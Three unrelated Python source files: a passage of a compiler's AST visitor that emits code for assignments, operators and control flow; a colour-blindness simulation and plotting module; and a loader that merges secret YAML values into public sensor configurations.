return node """ if ret.value is not None: self.visit_to_generate(ret.value) def store_variable(self, var_id: str, value: ast.AST, index: ast.AST = None): # if the value is None, it is a variable declaration if value is not None: if index is None: # if index is None, then it is a variable assignment self.visit_to_generate(value) self.generator.convert_store_variable(var_id) else: # if not, it is an array assignment self.generator.convert_load_symbol(var_id) self.visit_to_generate(index) self.visit_to_generate(value) self.generator.convert_set_array_item() def visit_AnnAssign(self, ann_assign: ast.AnnAssign): """ Visitor of an annotated assignment node :param ann_assign: the python ast variable assignment node """ var_id = self.visit(ann_assign.target) self.store_variable(var_id, ann_assign.value) def visit_Assign(self, assign: ast.Assign): """ Visitor of an assignment node :param assign: the python ast variable assignment node """ var_index = None var_id = self.visit(assign.targets[0]) # if it is a tuple, then it is an array assignment if isinstance(var_id, tuple): var_index = var_id[1] var_id: str = var_id[0] self.store_variable(var_id, assign.value, var_index) def visit_Subscript(self, subscript: ast.Subscript): """ Visitor of a subscript node :param subscript: the python ast subscript node """ if isinstance(subscript.ctx, ast.Load): # get item self.visit_to_generate(subscript.value) self.visit_to_generate(subscript.slice.value) self.generator.convert_get_array_item() else: # set item var_id = self.visit(subscript.value) return var_id, subscript.slice.value def visit_BinOp(self, bin_op: ast.BinOp): """ Visitor of a binary operation node :param bin_op: the python ast binary operation node """ if isinstance(bin_op.op, BinaryOperation): self.visit_to_generate(bin_op.left) self.visit_to_generate(bin_op.right) self.generator.convert_operation(bin_op.op) def visit_UnaryOp(self, un_op: ast.UnaryOp): """ Visitor of a binary operation node :param un_op: the python ast binary operation node """ if isinstance(un_op.op, UnaryOperation): self.visit_to_generate(un_op.operand) self.generator.convert_operation(un_op.op) def visit_Compare(self, compare: ast.Compare): """ Visitor of a compare operation node :param compare: the python ast compare operation node """ converted: bool = False left = compare.left for index, op in enumerate(compare.ops): right = compare.comparators[index] if isinstance(op, BinaryOperation): self.visit_to_generate(left) self.visit_to_generate(right) self.generator.convert_operation(op) # if it's more than two comparators, must include AND between the operations if not converted: converted = True else: self.generator.convert_operation(BinaryOp.And) left = right def visit_BoolOp(self, bool_op: ast.BoolOp): """ Visitor of a compare operation node :param bool_op: the python ast boolean operation node """ if isinstance(bool_op.op, BinaryOperation): left = bool_op.values[0] self.visit_to_generate(left) for index, right in enumerate(bool_op.values[1:]): self.visit_to_generate(right) self.generator.convert_operation(bool_op.op) def visit_While(self, while_node: ast.While): """ Verifies if the type of while test is valid :param while_node: the python ast while statement node """ start_addr: int = self.generator.convert_begin_while() for stmt in while_node.body: self.visit_to_generate(stmt) test_address: int = self.generator.address self.visit_to_generate(while_node.test) self.generator.convert_end_while(start_addr, test_address) for stmt in while_node.orelse: self.visit_to_generate(stmt) def visit_If(self, if_node: ast.If): """ Verifies if the type of if test is valid :param if_node: the python ast if statement node """ self.visit_to_generate(if_node.test) start_addr: int = self.generator.convert_begin_if() for stmt in if_node.body: self.visit_to_generate(stmt) if len(if_node.orelse) > 0: start_addr = self.generator.convert_begin_else(start_addr) for stmt in if_node.orelse: self.visit_to_generate(stmt) self.generator.convert_end_if(start_addr) def visit_IfExp(self, if_node: ast.IfExp): """ Verifies if the type of if test is valid :param if_node: the python ast if statement node """ self.visit_to_generate(if_node.test) start_addr: int = self.generator.convert_begin_if() self.visit_to_generate(if_node.body) start_addr = self.generator.convert_begin_else(start_addr) self.visit_to_generate(if_node.orelse) self.generator.convert_end_if(start_addr) def visit_Name(self, name: ast.Name) -> str: """ Visitor of a name node :param name: the python ast name identifier node :return: the identifier of the name """ return name.id def visit_NameConstant(self, constant: ast.NameConstant): """ Visitor of constant names node :param constant: the python ast name constant node :return: the value of the constant """ self.generator.convert_literal(constant.value) def visit_Num(self, num: ast.Num): """ Visitor of literal number node :param num: the python ast number node """ self.generator.convert_literal(num.n) def visit_Str(self, str: ast.Str): """ Visitor of literal string node :param str: the python ast string node """ self.generator.convert_literal(str.s) def visit_Tuple(self, tup_node: ast.Tuple): """ Visitor of literal tuple node :param tup_node: the python ast string node :return: the value of the tuple """ tup = tuple([value for value in tup_node.elts]) length = len(tup_node.elts) self.generator.convert_new_array(length) for index, value in enumerate(tup_node.elts): self.generator.convert_set_new_array_item_at(index) self.visit_to_generate(value) self.generator.convert_set_array_item()
""" Adapted from "The Color Blind Simulation function" by Matthew Wickline and the Human - Computer Interaction Resource Network (http://hcirn.com/), 2000 - 2001. """ import numpy as np rBlind = { "protan": {"cpu": 0.735, "cpv": 0.265, "am": 1.273463, "ayi": -0.073894}, "deutan": {"cpu": 1.14, "cpv": -0.14, "am": 0.968437, "ayi": 0.003331}, "tritan": {"cpu": 0.171, "cpv": -0.003, "am": 0.062921, "ayi": 0.292119}, } def rgb2xyz(rgb): r = rgb[0] g = rgb[1] b = rgb[2] x = 0.430574 * r + 0.341550 * g + 0.178325 * b y = 0.222015 * r + 0.706655 * g + 0.071330 * b z = 0.020183 * r + 0.129553 * g + 0.939180 * b return x, y, z def xyz2rgb(xyz): x = xyz[0] y = xyz[1] z = xyz[2] r = 3.063218 * x - 1.393325 * y - 0.475802 * z g = -0.969243 * x + 1.875966 * y + 0.041555 * z b = 0.067871 * x - 0.228834 * y + 1.069251 * z return r, g, b def anomylize(a, b): v = 1.75 d = v * 1 + 1 return ( (v * b[0] + a[0] * 1) / d, (v * b[1] + a[1] * 1) / d, (v * b[2] + a[2] * 1) / d, ) def monochrome(rgb): z = rgb[0] * 0.299 + rgb[1] * 0.587 + rgb[2] * 0.114 return z, z, z def blindMK(rgb, t): gamma = 2.2 wx = 0.312713 wy = 0.329016 wz = 0.358271 r = rgb[0] g = rgb[1] b = rgb[2] c_rgb = (r ** gamma, g ** gamma, b ** gamma) c_xyz = rgb2xyz(c_rgb) sum_xyz = sum(c_xyz) c_u = 0 c_v = 0 if sum_xyz != 0: c_u = c_xyz[0] / sum_xyz c_v = c_xyz[1] / sum_xyz nx = wx * c_xyz[1] / wy nz = wz * c_xyz[1] / wy d_y = 0 if c_u < rBlind[t]["cpu"]: clm = (rBlind[t]["cpv"] - c_v) / (rBlind[t]["cpu"] - c_u) else: clm = (c_v - rBlind[t]["cpv"]) / (c_u - rBlind[t]["cpu"]) clyi = c_v - c_u * clm d_u = (rBlind[t]["ayi"] - clyi) / (clm - rBlind[t]["am"]) d_v = (clm * d_u) + clyi s_x = d_u * c_xyz[1] / d_v s_y = c_xyz[1] s_z = (1 - (d_u + d_v)) * c_xyz[1] / d_v s_rgb = xyz2rgb((s_x, s_y, s_z)) d_x = nx - s_x d_z = nz - s_z d_rgb = xyz2rgb((d_x, d_y, d_z)) if d_rgb[0]: const = 0 if s_rgb[0] < 0 else 1 adjr = (const - s_rgb[0]) / d_rgb[0] else: adjr = 0 if d_rgb[1]: const = 0 if s_rgb[1] < 0 else 1 adjg = (const - s_rgb[1]) / d_rgb[1] else: adjg = 0 if d_rgb[2]: const = 0 if s_rgb[2] < 0 else 1 adjb = (const - s_rgb[2]) / d_rgb[2] else: adjb = 0 adjust = max( [ 0 if adjr > 1 or adjr < 0 else adjr, 0 if adjg > 1 or adjg < 0 else adjg, 0 if adjb > 1 or adjb < 0 else adjb, ] ) s_r = s_rgb[0] + (adjust * d_rgb[0]) s_g = s_rgb[1] + (adjust * d_rgb[1]) s_b = s_rgb[2] + (adjust * d_rgb[2]) def z(v): if v <= 0: const = 0.0 elif v >= 1: const = 1.0 else: const = v ** (1 / gamma) return const return z(s_r), z(s_g), z(s_b) fBlind = { "Normal": lambda v: v, "Protanopia": lambda v: blindMK(v, "protan"), "Protanomaly": lambda v: anomylize(v, blindMK(v, "protan")), "Deuteranopia": lambda v: blindMK(v, "deutan"), "Deuteranomaly": lambda v: anomylize(v, blindMK(v, "deutan")), "Tritanopia": lambda v: blindMK(v, "tritan"), "Tritanomaly": lambda v: anomylize(v, blindMK(v, "tritan")), "Achromatopsia": lambda v: monochrome(v), "Achromatomaly": lambda v: anomylize(v, monochrome(v)), } # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def simulate_image(img_path, colorblind_type): """ :param img_path: :param colorblind_type: Type of colourblindness to simulate, can be: 'Normal': Normal vision 'Protanopia': Red-green colorblindness (1% males) 'Protanomaly': Red-green colorblindness (1% males, 0.01% females) 'Deuteranopia': Red-green colorblindness (1% males) 'Deuteranomaly': Red-green colorblindness (most common type: 6% males, 0.4% females) 'Tritanopia': Blue-yellow colourblindness (<1% males and females) 'Tritanomaly' Blue-yellow colourblindness (0.01% males and females) 'Achromatopsia': Total colourblindness 'Achromatomaly': Total colourblindness :return: """ import matplotlib.image as mpimg import matplotlib.pyplot as plt filter_function = fBlind[colorblind_type] img = mpimg.imread(img_path) n_rows = img.shape[0] n_columns = img.shape[1] filtered_img = np.zeros((n_rows, n_columns, 3)) for r in range(n_rows): for c in range(n_columns): filtered_img[r, c] = filter_function(img[r, c, 0:3]) fig, axes = plt.subplots(1, 2, figsize=(12, 6)) axes[0].imshow(img) axes[1].imshow(filtered_img) axes[0].axis("off") axes[1].axis("off") axes[0].set_title("Normal Vision") axes[1].set_title("With " + colorblind_type) plt.show() def colorblind_filter(color, colorblind_type="Deuteranomaly"): """ Transforms an (r,g,b) colour into a simulation of how a person with colourblindnes would see that colour. :param color: rgb colour tuple to convert :param colorblind_type: Type of colourblindness to simulate, can be: 'Normal': Normal vision 'Protanopia': Red-green colorblindness (1% males) 'Protanomaly': Red-green colorblindness (1% males, 0.01% females) 'Deuteranopia': Red-green colorblindness (1% males) 'Deuteranomaly': Red-green colorblindness (most common type: 6% males, 0.4% females) 'Tritanopia': Blue-yellow colourblindness (<1% males and females) 'Tritanomaly' Blue-yellow colourblindness (0.01% males and females) 'Achromatopsia': Total colourblindness 'Achromatomaly': Total colourblindness :return: """ filter_function = fBlind[colorblind_type] return filter_function(color) def simulate_colors(colors, colorblind_type="Deuteranomaly", one_row=None, show=True): """ Simulate the appearance of colors with and without colourblindness. :param colors: A list of (r,g,b) colour tuples, with r, g andb floats between 0 and 1. :param colorblind_type: Type of colourblindness to simulate, can be: 'Normal': Normal vision 'Protanopia': Red-green colorblindness (1% males) 'Protanomaly': Red-green colorblindness (1% males, 0.01% females) 'Deuteranopia': Red-green colorblindness (1% males) 'Deuteranomaly': Red-green colorblindness (most common type: 6% males, 0.4% females) 'Tritanopia': Blue-yellow colourblindness (<1% males and females) 'Tritanomaly' Blue-yellow colourblindness (0.01% males and females) 'Achromatopsia': Total colourblindness 'Achromatomaly': Total colourblindness :param one_row: If True display colours on one row, if False as a grid. If one_row=None a grid is used when there are more than 8 colours. :param show: if True, calls ``plt.show()``. :return: """ import matplotlib.pyplot as plt from distinctipy import distinctipy filtered_colors = [colorblind_filter(color, colorblind_type) for color in colors] fig, axes = plt.subplots(1, 2, figsize=(8, 4)) distinctipy.color_swatch( colors, ax=axes[0], one_row=one_row, title="Viewed with Normal Sight" ) distinctipy.color_swatch( filtered_colors, ax=axes[1], one_row=one_row, title="Viewed with " + colorblind_type + " Colour Blindness", ) if show: plt.show() def simulate_clusters( dataset="s2", colorblind_type="Deuteranomaly", colorblind_distinct=False, show=True, ): """ Simulates the appearance of an example clustering dataset with and without colourblindness. :param dataset: The dataset to display, the options are: * s1, s2, s3, s4: 15 clusters with increasing overlaps from s1 to s4 * a1: 20 clusters * a2: 35 clusters * a3: 50 clusters * b1: 100 clusters :param colorblind_type: Type of colourblindness to simulate, can be: 'Normal': Normal vision 'Protanopia': Red-green colorblindness (1% males) 'Protanomaly': Red-green colorblindness (1% males, 0.01% females) 'Deuteranopia': Red-green colorblindness (1% males) 'Deuteranomaly': Red-green colorblindness (most common type: 6% males, 0.4% females) 'Tritanopia': Blue-yellow colourblindness (<1% males and females) 'Tritanomaly' Blue-yellow colourblindness (0.01% males and females) 'Achromatopsia': Total colourblindness 'Achromatomaly': Total colourblindness :param colorblind_distinct: If True generate colours to be as distinct as possible for colorblind_type. Else generate colours that are as distinct as possible for normal vision. :param show: if True, calls ``plt.show()``. :return: """ import matplotlib.pyplot as plt import pandas as pd from distinctipy import distinctipy if dataset not in ("s1", "s2", "s3", "s4", "a1", "a2", "a3", "b1"): raise ValueError("dataset must be s1, s2, s3, s4, a1, a2, a3 or b1") URL = ( "https://raw.githubusercontent.com/alan-turing-institute/distinctipy/" "main/distinctipy/datasets/" ) df = pd.read_csv(URL + dataset + ".csv") if colorblind_distinct: orig_colors = distinctipy.get_colors( df["cluster"].nunique(), colorblind_type=colorblind_type ) else: orig_colors = distinctipy.get_colors(df["cluster"].nunique()) orig_cmap = distinctipy.get_colormap(orig_colors) filtered_colors = [ colorblind_filter(color, colorblind_type) for color in orig_colors ] filtered_cmap = distinctipy.get_colormap(filtered_colors) fig, axes = plt.subplots(1, 2, figsize=(10, 5)) fig.tight_layout(rect=[0, 0.03, 1, 0.95]) fig.suptitle(str(df["cluster"].nunique()) + " clusters", fontsize=20) axes[0].scatter(df["x"], df["y"], c=df["cluster"], cmap=orig_cmap, s=6) axes[0].get_xaxis().set_visible(False) axes[0].get_yaxis().set_visible(False) axes[0].set_title("With Normal Vision") axes[1].scatter(df["x"], df["y"], c=df["cluster"], cmap=filtered_cmap, s=6) axes[1].get_xaxis().set_visible(False) axes[1].get_yaxis().set_visible(False) axes[1].set_title("With " + colorblind_type + " Colourblindness") if show: plt.show() def _main(): from distinctipy import distinctipy colors = distinctipy.get_colors(36) simulate_colors(colors, "Deuteranomaly") if __name__ == "__main__": _main()
from socutils import get_settings, exceptions import logging import sys import os logger = logging.getLogger("configer") def read_setting(path): try: config = get_settings(path) except exceptions.SettingsFileNotExistError: logger.error(f'{path} Not found') sys.exit(1) return config class PrivacyManager: def __init__(self, cpath='/appconfig', public_config_name="setting", privacy_config_name="secret"): self.public_config = read_setting(f'{cpath}/{public_config_name}.yaml') self.__privacy_data = read_setting(f'{cpath}/secure/{privacy_config_name}.yaml') def __get_secret(self, key_path): """ получаем приватные данные из секьюрного конфига""" if key_path not in self.__privacy_data: logger.critical(f'Not fount {key_path} in privacy_config') return False # print(f'{path} - > {privacy_data.get(path)}') return self.__privacy_data.get(key_path) def __get_recursively(self, search_dict, field, d_path=None): """ Получаем список объектов, которые нужно заменить """ paths_to_fields = [] for key, value in search_dict.items(): if value == field: if not d_path: paths_to_fields.append(key) if d_path: paths_to_fields.append(d_path + '.' + key) elif isinstance(value, dict): if d_path: key = d_path + '.' + key results = self.__get_recursively(value, field, key) for result in results: paths_to_fields.append(result) return paths_to_fields def get_production_config(self): """ Подставляем приватные данные в публичный конфиг """ from copy import deepcopy prod_setting = deepcopy(self.public_config) def set_val(path='', new_val=None): """ Вставляем значение в словарь по пути ключей """ if '.' in path: chunks = path.split('.') chunks.reverse() val = prod_setting while len(chunks) > 1: chunk = chunks.pop() if chunk.isdigit(): val = val[int(chunk)] else: val = val[chunk] if chunks[0].isdigit(): val[int(chunks[0])] = new_val else: val[chunks[0]] = new_val return True try: prod_setting[path] = new_val return True except (KeyError, IndexError): return False paths = self.__get_recursively(prod_setting, '<privacy>') for path in paths: secret = self.__get_secret(path) set_val(path=path, new_val=secret) return prod_setting def configer(): global_env = os.environ.get('GLOBAL_ENV') logger.debug(f'Global environment {global_env}') if not global_env: if os.path.exists('/opt/unicon/data'): logger.debug('Get settings from sdata') cpath = '/opt/unicon/data' else: logger.debug('Get settings from appconfing') cpath = '/opt/localconfigs/unicon/appconfig' elif global_env == 'docker': cpath = '/appconfig' else: print('ERRRO::Unknown Environment') sys.exit(1) config = read_setting(f'{cpath}/unicon-setting.yaml') def _get_cfg_list(): """ Получаем список конфигов сенсоров FIY: это не лишние действия, это понадобится, когда переделаю на многопоточность """ config.update({'sensors': {}}) conf_files = filter(lambda x: x.endswith('.yaml') and not x.startswith('unicon-setting'), os.listdir(path=f"{cpath}")) cfg_list = list(map(lambda line: line.split('.')[0], conf_files)) return cfg_list _sensors = _get_cfg_list() if len(_sensors) == 0: logger.error('Нет ни единого конфига АВ!') for conf_sensor in _sensors: pm = PrivacyManager(cpath=cpath, public_config_name=conf_sensor, privacy_config_name=conf_sensor) config['sensors'].update({**config['sensors'], **pm.get_production_config()}) return config